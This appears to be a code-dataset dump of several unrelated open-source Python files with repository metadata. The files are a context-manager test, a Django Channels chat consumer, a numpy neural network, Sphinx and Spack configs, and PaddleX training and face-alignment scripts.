self.assertEqual(blah.one, 1)
self.assertEqual(blah.two, 2)
self.assertEqual(blah.three, 3)
class ExitSwallowsExceptionTestCase(unittest.TestCase):
def testExitTrueSwallowsException(self):
class AfricanSwallow:
def __enter__(self): pass
def __exit__(self, t, v, tb): return True
try:
with AfricanSwallow():
1/0
except ZeroDivisionError:
self.fail("ZeroDivisionError should have been swallowed")
def testExitFalseDoesntSwallowException(self):
class EuropeanSwallow:
def __enter__(self): pass
def __exit__(self, t, v, tb): return False
try:
with EuropeanSwallow():
1/0
except ZeroDivisionError:
pass
else:
self.fail("ZeroDivisionError should have been raised")
class NestedWith(unittest.TestCase):
class Dummy(object):
def __init__(self, value=None, gobble=False):
if value is None:
value = self
self.value = value
self.gobble = gobble
self.enter_called = False
self.exit_called = False
def __enter__(self):
self.enter_called = True
return self.value
def __exit__(self, *exc_info):
self.exit_called = True
self.exc_info = exc_info
if self.gobble:
return True
class InitRaises(object):
def __init__(self): raise RuntimeError()
class EnterRaises(object):
def __enter__(self): raise RuntimeError()
def __exit__(self, *exc_info): pass
class ExitRaises(object):
def __enter__(self): pass
def __exit__(self, *exc_info): raise RuntimeError()
def testNoExceptions(self):
with self.Dummy() as a, self.Dummy() as b:
self.assertTrue(a.enter_called)
self.assertTrue(b.enter_called)
self.assertTrue(a.exit_called)
self.assertTrue(b.exit_called)
def testExceptionInExprList(self):
try:
with self.Dummy() as a, self.InitRaises():
pass
except:
pass
self.assertTrue(a.enter_called)
self.assertTrue(a.exit_called)
def testExceptionInEnter(self):
try:
with self.Dummy() as a, self.EnterRaises():
self.fail('body of bad with executed')
except RuntimeError:
pass
else:
self.fail('RuntimeError not reraised')
self.assertTrue(a.enter_called)
self.assertTrue(a.exit_called)
def testExceptionInExit(self):
body_executed = False
with self.Dummy(gobble=True) as a, self.ExitRaises():
body_executed = True
self.assertTrue(a.enter_called)
self.assertTrue(a.exit_called)
self.assertNotEqual(a.exc_info[0], None)
def testEnterReturnsTuple(self):
with self.Dummy(value=(1,2)) as (a1, a2), \
self.Dummy(value=(10, 20)) as (b1, b2):
self.assertEqual(1, a1)
self.assertEqual(2, a2)
self.assertEqual(10, b1)
self.assertEqual(20, b2)
def test_main():
run_unittest(FailureTestCase, NonexceptionalTestCase,
NestedNonexceptionalTestCase, ExceptionalTestCase,
NonLocalFlowControlTestCase,
AssignmentTargetTestCase,
ExitSwallowsExceptionTestCase,
NestedWith)
if __name__ == '__main__':
test_main()
| 35.108725
| 111
| 0.634654
|
49fef3ca3a8f71bcfc39eb745e50315bc15dff81
| 11,149
|
py
|
Python
|
chat/consumers.py
|
SelinJodhani/Open-Chat
|
ee9513d9efa39a2048525f76c605ddb8668b1580
|
[
"MIT"
] | null | null | null |
chat/consumers.py
|
SelinJodhani/Open-Chat
|
ee9513d9efa39a2048525f76c605ddb8668b1580
|
[
"MIT"
] | null | null | null |
chat/consumers.py
|
SelinJodhani/Open-Chat
|
ee9513d9efa39a2048525f76c605ddb8668b1580
|
[
"MIT"
] | null | null | null |
from channels.generic.websocket import AsyncJsonWebsocketConsumer
from channels.db import database_sync_to_async
from django.core.serializers import serialize
from django.utils import timezone
from django.core.paginator import Paginator
import json
import asyncio
from chat.models import RoomChatMessage, PrivateChatRoom, UnreadChatRoomMessages
from friend.models import FriendList
from account.utils import LazyAccountEncoder
from chat.utils import calculate_timestamp, LazyRoomChatMessageEncoder
from chat.exceptions import ClientError
from chat.constants import *
from account.models import Account
class ChatConsumer(AsyncJsonWebsocketConsumer):
async def connect(self):
"""
Called when the websocket is handshaking as part of initial connection.
"""
print("ChatConsumer: connect: " + str(self.scope["user"]))
# let everyone connect. But limit read/write to authenticated users
await self.accept()
# the room_id will define what it means to be "connected". If it is not None, then the user is connected.
self.room_id = None
async def receive_json(self, content):
"""
Called when we get a text frame. Channels will JSON-decode the payload
for us and pass it as the first argument.
"""
# Messages will have a "command" key we can switch on
print("ChatConsumer: receive_json")
command = content.get("command", None)
try:
if command == "join":
print("joining room: " + str(content['room_id']))
await self.join_room(content["room_id"])
elif command == "leave":
# Leave the room
await self.leave_room(content["room_id"])
elif command == "send":
if len(content["message"].lstrip()) == 0:
raise ClientError(422,"You can't send an empty message.")
await self.send_room(content["room_id"], content["message"])
elif command == "get_room_chat_messages":
await self.display_progress_bar(True)
room = await get_room_or_error(content['room_id'], self.scope["user"])
payload = await get_room_chat_messages(room, content['page_number'])
if payload != None:
payload = json.loads(payload)
await self.send_messages_payload(payload['messages'], payload['new_page_number'])
else:
raise ClientError(204,"Something went wrong retrieving the chatroom messages.")
await self.display_progress_bar(False)
elif command == "get_user_info":
await self.display_progress_bar(True)
room = await get_room_or_error(content['room_id'], self.scope["user"])
payload = get_user_info(room, self.scope["user"])
if payload != None:
payload = json.loads(payload)
await self.send_user_info_payload(payload['user_info'])
else:
raise ClientError(204, "Something went wrong retrieving the other users account details.")
await self.display_progress_bar(False)
except ClientError as e:
await self.handle_client_error(e)
async def disconnect(self, code):
"""
Called when the WebSocket closes for any reason.
"""
# Leave the room
print("ChatConsumer: disconnect")
try:
if self.room_id != None:
await self.leave_room(self.room_id)
except Exception as e:
print("EXCEPTION: " + str(e))
pass
async def join_room(self, room_id):
"""
Called by receive_json when someone sent a join command.
"""
# The logged-in user is in our scope thanks to the authentication ASGI middleware (AuthMiddlewareStack)
print("ChatConsumer: join_room: " + str(room_id))
try:
room = await get_room_or_error(room_id, self.scope["user"])
except ClientError as e:
return await self.handle_client_error(e)
# Add user to "users" list for room
await connect_user(room, self.scope["user"])
# Store that we're in the room
self.room_id = room.id
await on_user_connected(room, self.scope["user"])
# Add them to the group so they get room messages
await self.channel_layer.group_add(
room.group_name,
self.channel_name,
)
# Instruct their client to finish opening the room
await self.send_json({
"join": str(room.id),
})
async def leave_room(self, room_id):
"""
Called by receive_json when someone sent a leave command.
"""
# The logged-in user is in our scope thanks to the authentication ASGI middleware
print("ChatConsumer: leave_room")
room = await get_room_or_error(room_id, self.scope["user"])
# Remove user from "connected_users" list
await disconnect_user(room, self.scope["user"])
# Remove that we're in the room
self.room_id = None
# Remove them from the group so they no longer get room messages
await self.channel_layer.group_discard(
room.group_name,
self.channel_name,
)
# Instruct their client to finish closing the room
await self.send_json({
"leave": str(room.id),
})
async def send_room(self, room_id, message):
"""
Called by receive_json when someone sends a message to a room.
"""
print("ChatConsumer: send_room")
# Check they are in this room
if self.room_id != None:
if str(room_id) != str(self.room_id):
print("CLIENT ERRROR 1")
raise ClientError("ROOM_ACCESS_DENIED", "Room access denied")
else:
print("CLIENT ERRROR 2")
raise ClientError("ROOM_ACCESS_DENIED", "Room access denied")
# Get the room and send to the group about it
room = await get_room_or_error(room_id, self.scope["user"])
# get list of connected_users
connected_users = room.connected_users.all()
# Execute these functions asychronously
await asyncio.gather(*[
append_unread_msg_if_not_connected(room, room.user1, connected_users, message),
append_unread_msg_if_not_connected(room, room.user2, connected_users, message),
create_room_chat_message(room, self.scope["user"], message)
])
await self.channel_layer.group_send(
room.group_name,
{
"type": "chat.message",
"profile_image": self.scope["user"].profile_image.url,
"username": self.scope["user"].username,
"user_id": self.scope["user"].id,
"message": message,
}
)
async def chat_message(self, event):
"""
Called when someone has messaged our chat.
"""
# Send a message down to the client
print("ChatConsumer: chat_message")
timestamp = calculate_timestamp(timezone.now())
await self.send_json(
{
"msg_type": MSG_TYPE_MESSAGE,
"username": event["username"],
"user_id": event["user_id"],
"profile_image": event["profile_image"],
"message": event["message"],
"natural_timestamp": timestamp,
},
)
async def send_messages_payload(self, messages, new_page_number):
"""
Send a payload of messages to the ui
"""
print("ChatConsumer: send_messages_payload. ")
await self.send_json(
{
"messages_payload": "messages_payload",
"messages": messages,
"new_page_number": new_page_number,
},
)
async def send_user_info_payload(self, user_info):
"""
Send a payload of user information to the ui
"""
print("ChatConsumer: send_user_info_payload. ")
await self.send_json(
{
"user_info": user_info,
},
)
async def display_progress_bar(self, is_displayed):
"""
1. is_displayed = True
- Display the progress bar on UI
2. is_displayed = False
- Hide the progress bar on UI
"""
print("DISPLAY PROGRESS BAR: " + str(is_displayed))
await self.send_json(
{
"display_progress_bar": is_displayed
}
)
async def handle_client_error(self, e):
"""
Called when a ClientError is raised.
Sends error data to UI.
"""
errorData = {}
errorData['error'] = e.code
if e.message:
errorData['message'] = e.message
await self.send_json(errorData)
return
@database_sync_to_async
def get_room_or_error(room_id, user):
"""
Tries to fetch a room for the user, checking permissions along the way.
"""
try:
room = PrivateChatRoom.objects.get(pk=room_id)
except PrivateChatRoom.DoesNotExist:
raise ClientError("ROOM_INVALID", "Invalid room.")
# Is this user allowed in the room? (must be user1 or user2)
if user != room.user1 and user != room.user2:
raise ClientError("ROOM_ACCESS_DENIED", "You do not have permission to join this room.")
# Are the users in this room friends?
friend_list = FriendList.objects.get(user=user).friends.all()
if not room.user1 in friend_list:
if not room.user2 in friend_list:
raise ClientError("ROOM_ACCESS_DENIED", "You must be friends to chat.")
return room
# I don't think this requires @database_sync_to_async since we are just accessing a model field
# https://docs.djangoproject.com/en/3.1/ref/models/instances/#refreshing-objects-from-database
def get_user_info(room, user):
"""
Retrieve the user info for the user you are chatting with
"""
try:
# Determine who is who
other_user = room.user1
if other_user == user:
other_user = room.user2
payload = {}
s = LazyAccountEncoder()
# convert to list for serializer and select first entry (there will be only 1)
payload['user_info'] = s.serialize([other_user])[0]
return json.dumps(payload)
except ClientError as e:
raise ClientError("DATA_ERROR", "Unable to get that users information.")
return None
@database_sync_to_async
def create_room_chat_message(room, user, message):
return RoomChatMessage.objects.create(user=user, room=room, content=message)
@database_sync_to_async
def get_room_chat_messages(room, page_number):
try:
qs = RoomChatMessage.objects.by_room(room)
p = Paginator(qs, DEFAULT_ROOM_CHAT_MESSAGE_PAGE_SIZE)
payload = {}
messages_data = None
new_page_number = int(page_number)
if new_page_number <= p.num_pages:
new_page_number = new_page_number + 1
s = LazyRoomChatMessageEncoder()
payload['messages'] = s.serialize(p.page(page_number).object_list)
else:
payload['messages'] = "None"
payload['new_page_number'] = new_page_number
return json.dumps(payload)
except Exception as e:
print("EXCEPTION: " + str(e))
return None
@database_sync_to_async
def connect_user(room, user):
# add user to connected_users list
account = Account.objects.get(pk=user.id)
return room.connect_user(account)
@database_sync_to_async
def disconnect_user(room, user):
# remove from connected_users list
account = Account.objects.get(pk=user.id)
return room.disconnect_user(account)
# If the user is not connected to the chat, increment "unread messages" count
@database_sync_to_async
def append_unread_msg_if_not_connected(room, user, connected_users, message):
if not user in connected_users:
try:
unread_msgs = UnreadChatRoomMessages.objects.get(room=room, user=user)
unread_msgs.most_recent_message = message
unread_msgs.count += 1
unread_msgs.save()
except UnreadChatRoomMessages.DoesNotExist:
UnreadChatRoomMessages(room=room, user=user, count=1).save()
pass
return
# When a user connects, reset their unread message count
@database_sync_to_async
def on_user_connected(room, user):
# confirm they are in the connected users list
connected_users = room.connected_users.all()
if user in connected_users:
try:
# reset count
unread_msgs = UnreadChatRoomMessages.objects.get(room=room, user=user)
unread_msgs.count = 0
unread_msgs.save()
except UnreadChatRoomMessages.DoesNotExist:
UnreadChatRoomMessages(room=room, user=user).save()
pass
return
| 30.545205
| 107
| 0.729482
|
45c577c80f77e848eb30eed18a7ed4b3baf008e2
| 7,181
|
py
|
Python
|
programming_assignments/3_Neural-Networks/nn.py
|
biqar/Fall-2020-ITCS-8156-MachineLearning
|
ce14609327e5fa13f7af7b904a69da3aa3606f37
|
[
"MIT"
] | null | null | null |
programming_assignments/3_Neural-Networks/nn.py
|
biqar/Fall-2020-ITCS-8156-MachineLearning
|
ce14609327e5fa13f7af7b904a69da3aa3606f37
|
[
"MIT"
] | null | null | null |
programming_assignments/3_Neural-Networks/nn.py
|
biqar/Fall-2020-ITCS-8156-MachineLearning
|
ce14609327e5fa13f7af7b904a69da3aa3606f37
|
[
"MIT"
] | null | null | null |
""" Neural Network
referenced NN code by Chuck Anderson in R and C++
by Jake Lee (lemin)
example usage:
X = numpy.array([0,0,1,0,0,1,1,1]).reshape(4,2)
T = numpy.array([0,1,1,0,1,0,0,1]).reshape(4,2)
nn = nnet.NeuralNet([2,3,2])
nn.train(X,T, wprecision=1e-20, fprecision=1e-2)
Y = nn.use(X)
"""
import numpy as np
import matplotlib.pyplot as plt
from grad import scg, steepest
from copy import copy
from util import Standardizer
class NeuralNet:
""" neural network class for regression
Parameters
----------
nunits: list
the number of inputs, hidden units, and outputs
Methods
-------
set_hunit
update/initiate weights
pack
pack multiple weights of each layer into one vector
forward
forward processing of neural network
backward
back-propagation of neural network
train
train the neural network
use
appply the trained network for prediction
Attributes
----------
_nLayers
the number of hidden unit layers
rho
learning rate
_W
weights
_weights
weights in one dimension (_W is referencing _weight)
stdX
standardization class for data
stdT
standardization class for target
Notes
-----
"""
def __init__(self, nunits):
self._nLayers=len(nunits)-1
self.rho = [1] * self._nLayers
self._W = []
wdims = []
lenweights = 0
for i in range(self._nLayers):
nwr = nunits[i] + 1
nwc = nunits[i+1]
wdims.append((nwr, nwc))
lenweights = lenweights + nwr * nwc
self._weights = np.random.uniform(-0.1,0.1, lenweights)
start = 0 # fixed index error 20110107
for i in range(self._nLayers):
end = start + wdims[i][0] * wdims[i][1]
self._W.append(self._weights[start:end])
self._W[i].resize(wdims[i])
start = end
self.stdX = None
self.stdT = None
self.stdTarget = True
def add_ones(self, w):
return np.hstack((np.ones((w.shape[0], 1)), w))
def get_nlayers(self):
return self._nLayers
def set_hunit(self, w):
for i in range(self._nLayers-1):
if w[i].shape != self._W[i].shape:
print("set_hunit: shapes do not match!")
break
else:
self._W[i][:] = w[i][:]
def pack(self, w):
return np.hstack(map(np.ravel, w))
def unpack(self, weights):
self._weights[:] = weights[:] # unpack
def cp_weight(self):
return copy(self._weights)
def RBF(self, X, m=None,s=None):
if m is None: m = np.mean(X)
if s is None: s = 2 #np.std(X)
r = 1. / (np.sqrt(2*np.pi)* s)
return r * np.exp(-(X - m) ** 2 / (2 * s ** 2))
def forward(self,X):
t = X
Z = []
for i in range(self._nLayers):
Z.append(t)
if i == self._nLayers - 1:
t = np.dot(self.add_ones(t), self._W[i])
else:
t = np.tanh(np.dot(self.add_ones(t), self._W[i]))
#t = self.RBF(np.dot(np.hstack((np.ones((t.shape[0],1)),t)),self._W[i]))
return (t, Z)
def backward(self, error, Z, T, lmb=0):
delta = error
N = T.size
dws = []
for i in range(self._nLayers - 1, -1, -1):
rh = float(self.rho[i]) / N
if i==0:
lmbterm = 0
else:
lmbterm = lmb * np.vstack((np.zeros((1, self._W[i].shape[1])),
self._W[i][1:,]))
dws.insert(0,(-rh * np.dot(self.add_ones(Z[i]).T, delta) + lmbterm))
if i != 0:
delta = np.dot(delta, self._W[i][1:, :].T) * (1 - Z[i]**2)
return self.pack(dws)
def _errorf(self, T, Y):
return T - Y
def _objectf(self, T, Y, wpenalty):
return 0.5 * np.mean(np.square(T - Y)) + wpenalty
def train(self, X, T, **params):
verbose = params.pop('verbose', False)
# training parameters
_lambda = params.pop('Lambda', 0.)
#parameters for scg
niter = params.pop('niter', 1000)
wprecision = params.pop('wprecision', 1e-10)
fprecision = params.pop('fprecision', 1e-10)
wtracep = params.pop('wtracep', False)
ftracep = params.pop('ftracep', False)
# optimization
optim = params.pop('optim', 'scg')
if self.stdX == None:
explore = params.pop('explore', False)
self.stdX = Standardizer(X, explore)
Xs = self.stdX.standardize(X)
if self.stdT == None and self.stdTarget:
self.stdT = Standardizer(T)
T = self.stdT.standardize(T)
def gradientf(weights):
self.unpack(weights)
Y,Z = self.forward(Xs)
error = self._errorf(T, Y)
return self.backward(error, Z, T, _lambda)
def optimtargetf(weights):
""" optimization target function : MSE
"""
self.unpack(weights)
#self._weights[:] = weights[:] # unpack
Y,_ = self.forward(Xs)
Wnb=np.array([])
for i in range(self._nLayers):
if len(Wnb)==0: Wnb=self._W[i][1:,].reshape(self._W[i].size-self._W[i][0,].size,1)
else: Wnb = np.vstack((Wnb,self._W[i][1:,].reshape(self._W[i].size-self._W[i][0,].size,1)))
wpenalty = _lambda * np.dot(Wnb.flat ,Wnb.flat)
return self._objectf(T, Y, wpenalty)
if optim == 'scg':
result = scg(self.cp_weight(), gradientf, optimtargetf,
wPrecision=wprecision, fPrecision=fprecision,
nIterations=niter,
wtracep=wtracep, ftracep=ftracep,
verbose=False)
self.unpack(result['w'][:])
self.f = result['f']
elif optim == 'steepest':
result = steepest(self.cp_weight(), gradientf, optimtargetf,
nIterations=niter,
xPrecision=wprecision, fPrecision=fprecision,
xtracep=wtracep, ftracep=ftracep )
self.unpack(result['w'][:])
if ftracep:
self.ftrace = result['ftrace']
if 'reason' in result.keys() and verbose:
print(result['reason'])
return result
def use(self, X, retZ=False):
if self.stdX:
Xs = self.stdX.standardize(X)
else:
Xs = X
Y, Z = self.forward(Xs)
if self.stdT is not None:
Y = self.stdT.unstandardize(Y)
if retZ:
return Y, Z
return Y
| 29.920833
| 107
| 0.493246
|
a91c08d178195ea7cf3ccb8406aa95166a8124f0
| 4,868
|
py
|
Python
|
docs/conf.py
|
renan-eccel/sillysort
|
98531bb011f220d0877ba2abfd202d52026a2695
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
renan-eccel/sillysort
|
98531bb011f220d0877ba2abfd202d52026a2695
|
[
"MIT"
] | 310
|
2018-05-14T01:32:25.000Z
|
2022-03-28T06:34:20.000Z
|
docs/conf.py
|
renan-eccel/sillysort
|
98531bb011f220d0877ba2abfd202d52026a2695
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# sillysort documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import sillysort
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'SillySort'
copyright = u"2018, Renan Artur Lopes Eccel"
author = u"Renan Artur Lopes Eccel"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = sillysort.__version__
# The full version, including alpha/beta/rc tags.
release = sillysort.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'sillysortdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, 'sillysort.tex',
u'SillySort Documentation',
u'Renan Artur Lopes Eccel', 'manual'),
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'sillysort',
u'SillySort Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'sillysort',
u'SillySort Documentation',
author,
'sillysort',
'One line description of project.',
'Miscellaneous'),
]
| 29.682927
| 77
| 0.685703
|
bb87615f8d4d4dc3de0700618449530b827e68ee
| 1,036
|
py
|
Python
|
servers/pso/pyEUROPA/pyEUROPA/interface/enviroment.py
|
arpitgogia/mars_city
|
30cacd80487a8c2354bbc15b4fad211ed1cb4f9d
|
[
"BSD-2-Clause-FreeBSD"
] | 25
|
2016-07-20T04:49:14.000Z
|
2021-08-25T09:05:04.000Z
|
servers/pso/pyEUROPA/pyEUROPA/interface/enviroment.py
|
arpitgogia/mars_city
|
30cacd80487a8c2354bbc15b4fad211ed1cb4f9d
|
[
"BSD-2-Clause-FreeBSD"
] | 16
|
2016-12-27T08:30:27.000Z
|
2018-06-18T08:51:44.000Z
|
servers/pso/pyEUROPA/pyEUROPA/interface/enviroment.py
|
arpitgogia/mars_city
|
30cacd80487a8c2354bbc15b4fad211ed1cb4f9d
|
[
"BSD-2-Clause-FreeBSD"
] | 49
|
2016-07-20T13:08:27.000Z
|
2020-06-02T18:26:12.000Z
|
from pyEUROPA.engine import makePSEngine, stopPSEngine
class Enviroment(object):
"""Planning environment"""
_objects = []
_locations = {}
def set_rover(self):
pass
def set_rover_goal(self):
pass
def add_location(self, name, position):
"""Locations are places of interest for the rover"""
if name in self._locations:
raise ValueError("Location already exists in environment!")
self._locations[name]=instance
def remove_location(self, name):
del self._locations[name]
def get_plan(self):
pass
def go(self):
# Convert Python to EUROPA's NDDL
self._is_alive = True
self._psengine = makePSEngine()
# Load actor's initial enviroment
errors = self._psengine.executeScript("nddl",enviroment, True);
if (errors!=""):
raise ValueError("Failed loading inital enviroment:"+errors);
def kill(self):
self._is_alive = False
stopPSEngine(self._psengine)
| 23.545455
| 73
| 0.627413
|
24806362bf270f58126adf6bbe7fcc2cc58189e6
| 700
|
py
|
Python
|
setup.py
|
jinhopark8345/ICC
|
be0ee8fb36399b156427749c867d64524dff786e
|
[
"MIT"
] | null | null | null |
setup.py
|
jinhopark8345/ICC
|
be0ee8fb36399b156427749c867d64524dff786e
|
[
"MIT"
] | 7
|
2020-09-28T07:17:58.000Z
|
2020-11-25T08:00:08.000Z
|
setup.py
|
jinhopark8345/icc
|
be0ee8fb36399b156427749c867d64524dff786e
|
[
"MIT"
] | null | null | null |
import os
import sys
import inspect
import platform
import threading
# ROOT_DIR = None
# def setup():
# main_id = None
# for t in threading.enumerate():
# if t.name == 'MainThread':
# main_id = t.ident
# break
# if not main_id:
# raise RuntimeError("Main thread exited before execution")
# current_main_frame = sys._current_frames()[main_id]
# base_frame = inspect.getouterframes(current_main_frame)[-1]
# if platform.system() == 'Windows':
# filename = base_frame.filename
# else:
# filename = base_frame[0].f_code.co_filename
# global ROOT_DIR
# ROOT_DIR = os.path.dirname(os.path.abspath(filename))
| 24.137931
| 67
| 0.638571
|
d0b62eb976e9048d459353edbc3c2aaaf50a47b0
| 1,579
|
py
|
Python
|
tutorials/slim/prune/object_detection/yolov3_prune_train.py
|
yaoshanliang/PaddleX
|
fe40b6d10db0e4d46f3a73cc5e83c3236d6a5842
|
[
"Apache-2.0"
] | 3,655
|
2020-03-28T09:19:50.000Z
|
2022-03-31T13:28:39.000Z
|
tutorials/slim/prune/object_detection/yolov3_prune_train.py
|
yaoshanliang/PaddleX
|
fe40b6d10db0e4d46f3a73cc5e83c3236d6a5842
|
[
"Apache-2.0"
] | 829
|
2020-03-28T04:03:18.000Z
|
2022-03-31T14:34:30.000Z
|
tutorials/slim/prune/object_detection/yolov3_prune_train.py
|
yaoshanliang/PaddleX
|
fe40b6d10db0e4d46f3a73cc5e83c3236d6a5842
|
[
"Apache-2.0"
] | 738
|
2020-03-28T03:56:46.000Z
|
2022-03-31T13:11:03.000Z
|
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
from paddlex.det import transforms
import paddlex as pdx
insect_dataset = 'https://bj.bcebos.com/paddlex/datasets/insect_det.tar.gz'
pdx.utils.download_and_decompress(insect_dataset, path='./')
train_transforms = transforms.Compose([
transforms.MixupImage(mixup_epoch=250),
transforms.RandomDistort(),
transforms.RandomExpand(),
transforms.RandomCrop(),
transforms.Resize(
target_size=608, interp='RANDOM'),
transforms.RandomHorizontalFlip(),
transforms.Normalize(),
])
eval_transforms = transforms.Compose([
transforms.Resize(
target_size=608, interp='CUBIC'),
transforms.Normalize(),
])
train_dataset = pdx.datasets.VOCDetection(
data_dir='insect_det',
file_list='insect_det/train_list.txt',
label_list='insect_det/labels.txt',
transforms=train_transforms,
shuffle=True)
eval_dataset = pdx.datasets.VOCDetection(
data_dir='insect_det',
file_list='insect_det/val_list.txt',
label_list='insect_det/labels.txt',
transforms=eval_transforms)
num_classes = len(train_dataset.labels)
model = pdx.det.YOLOv3(num_classes=num_classes, backbone='MobileNetV1')
model.train(
num_epochs=270,
train_dataset=train_dataset,
train_batch_size=8,
eval_dataset=eval_dataset,
learning_rate=0.000125,
lr_decay_epochs=[210, 240],
pretrain_weights='output/yolov3_mobilenetv1/best_model',
save_dir='output/yolov3_mobilenetv1_prune',
sensitivities_file='./yolov3.sensi.data',
eval_metric_loss=0.05,
use_vdl=True)
| 28.709091
| 75
| 0.742242
|
00c0f494791c7f6e7914eb00575dfa92332d99d1
| 1,569
|
py
|
Python
|
package/spack-perl-io-html/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | 1
|
2018-07-17T07:45:09.000Z
|
2018-07-17T07:45:09.000Z
|
package/spack-perl-io-html/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | null | null | null |
package/spack-perl-io-html/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | null | null | null |
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PerlIoHtml(PerlPackage):
"""Open an HTML file with automatic charset detection."""
homepage = "http://search.cpan.org/~cjm/IO-HTML-1.001/lib/IO/HTML.pm"
url = "http://search.cpan.org/CPAN/authors/id/C/CJ/CJM/IO-HTML-1.001.tar.gz"
version('1.001', '3f8958718844dc96b9f6946f21d70d22')
| 44.828571
| 85
| 0.67559
|
254e8fdc4209350e303b62aab677e5e6f7435c85
| 738
|
py
|
Python
|
get_align_face.py
|
WilsonWeng-hub/Python-Tensorflow-Face-v2.0
|
10ab4f031b9061bcd124f75decb31da35eb6c6c1
|
[
"Apache-2.0"
] | 117
|
2018-01-24T09:19:51.000Z
|
2022-03-27T12:43:48.000Z
|
get_align_face.py
|
WilsonWeng-hub/Python-Tensorflow-Face-v2.0
|
10ab4f031b9061bcd124f75decb31da35eb6c6c1
|
[
"Apache-2.0"
] | 5
|
2018-02-24T07:28:54.000Z
|
2020-09-15T16:20:41.000Z
|
get_align_face.py
|
WilsonWeng-hub/Python-Tensorflow-Face-v2.0
|
10ab4f031b9061bcd124f75decb31da35eb6c6c1
|
[
"Apache-2.0"
] | 48
|
2018-01-28T08:41:31.000Z
|
2021-05-11T02:07:25.000Z
|
import multiprocessing
import os
from face_lib import my_api
input_dir = './out' # 输入的人脸图片数据集
output_dir = './train_faces' # 输出的图片总目录
# 如果不存在目录 就创造目录
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if __name__ == '__main__':
get_face = my_api.GetAlignedFace(input_dir, output_dir)
# 开启多进程
pool = multiprocessing.Pool(processes=6)
photo_names = get_face.pic_names
print(photo_names)
pic_num = 0 # 已存在的图片目录总数
for file_name in photo_names:
name = file_name
pool.apply_async(get_face.photo_read, (file_name, pic_num))
pic_num = pic_num + 1
pool.close()
pool.join() # 调用join之前,先调用close函数,否则会出错。执行完close后不会有新的进程加入到pool,join函数等待所有子进程结束
print('Done')
| 21.085714
| 84
| 0.700542
|
2e704d8c400ec9617225b82a4aacc35eed93c32b
| 6,662
|
py
|
Python
|
UMLRT2Kiltera_MM/MT_pre__TransitionType.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
